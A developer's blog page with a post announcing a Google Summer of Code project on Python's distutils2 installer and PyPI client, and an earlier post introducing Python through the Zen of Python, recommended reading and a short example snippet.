WOW. I’ve been accepted to be a part of the Google Summer of Code program, and will work on Python distutils2, with a lot of (interesting!) people.

So, it’s about building the successor of Distutils, i.e. “the Python package manager”. Today, there are too many ways to package a Python application (pip, setuptools, distribute, distutils, etc.), so there is a huge effort to make in order to make all this packaging stuff interoperable, as pointed out by PEP 376.

In more detail, I’m going to work on the Installer / Uninstaller features of Distutils2, and on a PyPI XML-RPC client for distutils2. Here are the already defined tasks:

Implement Distutils2 APIs described in PEP 376.
Add the uninstall command.
Think about a basic installer / uninstaller script (with deps), similar to pip/easy_install.
In a pypi subpackage:
Integrate a module similar to setuptools’ package_index.
PyPI XML-RPC client for distutils 2: http://bugs.python.org/issue8190

As I’m relatively new to Python, I’ll need some extra work in order to apply all the good practices, among other things that can make a developer’s life joyful. I’ll post here, each week, my progress and my thoughts about Python, and especially about the Python packaging world.

Python? Go!

2009-12-17T00:00:00+01:00

I have now been working on a Django project for a little over a month and, necessarily, I’m learning Python along the way. I take undisguised pleasure in discovering this language (and in using it), and it keeps surprising me. The first words that come to mind about Python are “logical” and “simple”. And yet powerful all the same. I never miss an opportunity to do a bit of evangelism with the few people willing to listen to me.

The Zen of Python

Before anything else, I think it is useful to quote Tim Peters and PEP 20, which make a very good introduction to the language, and which take the form of an easter egg shipped with Python:

>>> import this
The Zen of Python, by Tim Peters

Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
Sparse is better than dense.
Readability counts.
Special cases aren't special enough to break the rules.
Although practicality beats purity.
Errors should never pass silently.
Unless explicitly silenced.
In the face of ambiguity, refuse the temptation to guess.
There should be one-- and preferably only one --obvious way to do it.
Although that way may not be obvious at first unless you're Dutch.
Now is better than never.
Although never is often better than *right* now.
If the implementation is hard to explain, it's a bad idea.
If the implementation is easy to explain, it may be a good idea.
Namespaces are one honking great idea -- let's do more of those!

I have the vague feeling that this is what I always tried to do in PHP, and particularly in the Spiral framework, but by adding these concepts in a layer on top of the language. Here, it is the very spirit of Python, which means that most Python libraries follow these concepts. Isn’t life beautiful?

How to get started, and where?

For my part, I started by reading a few interesting books and articles, which are a good introduction to the subject (the list is obviously not exhaustive, and your comments are welcome):

Dive into python
A byte of python
Python: petit guide à l’usage du développeur agile, by Tarek Ziadé
The official Python documentation, of course!
The videos from PyconFR 2009!
A bit of time, and an open Python console :)

I also try to share as much as possible the resources I find from time to time, either via twitter or via my delicious account. Go have a look at the python tag on my profile; maybe you will find interesting things there, who knows!

A sexy Python

A few features that should make your mouth water:

Chaining comparison operators is possible (a < b < c in a condition)
Multiple assignment (you can write a, b, c = 1, 2, 3, for instance)
Lists are simple to manipulate!
List comprehensions, or how to perform complex operations on lists in a simple way.
Doctests, or how to write tests directly in the documentation of your classes, while documenting them with real examples.
Metaclasses, or how to control the way classes are built.
Python is a strongly and dynamically typed language: this is what annoyed me about PHP, which is a weakly and dynamically typed language.
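A few of these features can be seen together in a short sketch. The average function and the variable names are only illustrative, and metaclasses are left out to keep it small.

```python
import doctest


def average(values):
    """Return the arithmetic mean of a non-empty list.

    The example below is both documentation and a test (a doctest):

    >>> average([1, 2, 3])
    2.0
    """
    return sum(values) / len(values)


# Multiple assignment
a, b, c = 1, 2, 3

# Chained comparison, equivalent to (a < b) and (b < c)
in_order = a < b < c

# List comprehension: squares of the even numbers below 5
squares = [n * n for n in range(5) if n % 2 == 0]

# Strong typing: mixing a string and an integer raises an error
# instead of silently converting one of them
try:
    "1" + 1
    strongly_typed = False
except TypeError:
    strongly_typed = True

# Run the example embedded in the docstring; nothing is printed on success
doctest.run_docstring_examples(average, {"average": average})
```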

You can also go and watch the workshop given by Victor Stinner during PyconFR 09. Have fun!

Alexis Métaireau - code

Changing the primary key of a model in Django

Generating UUIDs in pure python

Getting the constraint name

Using uuids in URLs in a Django app

Adding collaboration on uMap, third update

JavaScript modules

Internals

Naming matters

Leaflet layers and uMap features

GeoJSON and Leaflet

This is not reactive programming

A syncing proof of concept

Syncing map properties

Websockets

Code architecture

Syncing features

What’s next ?

Returning objects from an arrow function

Format an USB disk from the command-line on MacOSX

Rescuing a broken asahi linux workstation

Using pelican to track my worked and volunteer hours

Reading information from the titles

The markdown preprocessor

Plugging this with pelican

Adding a graph

Adding Real-Time Collaboration to uMap, second week

The optimistic-merge approach

Using SQLite in the browser

Related projects in the SIG field

How to transport the data?

Server-Sent Events (SSE)

Importing a PostgreSQL dump under a different database name

Decrypting the dump

Importing while changing ACLs and database name

Deploying and customizing datasette

Adding authentication

Using templates

Adding Real-Time Collaboration to uMap, first week

Installation

And you’re done!

How it’s currently working

Data

Real-time collaboration : the different approaches

JSON Patch and JSON Merge Patch

Using CRDTs

Using Datasette for tracking my professional activity

Using DISTINCT in Parent-Child Relationships

Convert string to duration

llm command-line tips

Setting up a IRC Bouncer with ZNC

Installation of ZNC

Weechat configuration

How to run the vigogne model locally

Creating a simple command line to post snippets on Gitlab

Creating an online space to share markdown files

Conversion d’un fichier svg en favicon.ico

Découverte de nouveaux outils pour le développement: LLM, Helix et plus

LLM

Helix

Divers

Running the Gitlab CI locally

ArchLinux et mise à jour du keyring

Python packaging with Hatch, pipx and Zsh environment variables

Isolating system packages

Manipulating env variables with Zsh

Profiling and speeding up Django and Pytest

Changing the hashing algorithm to speedup tests

Speeding DNS lookups

Installation de Mosquitto, InfluxDB, Telegraf et Grafana

Installer et se connecter au serveur

Configurer les DNS

Installer Mosquitto

Vérifions que tout fonctionne comme prévu :

Installation d’InfluxDB et Telegraf

Configuration de Telegraf

Installation de Grafana

Nginx

Groupement d’achats & partage d’expérience

Organisation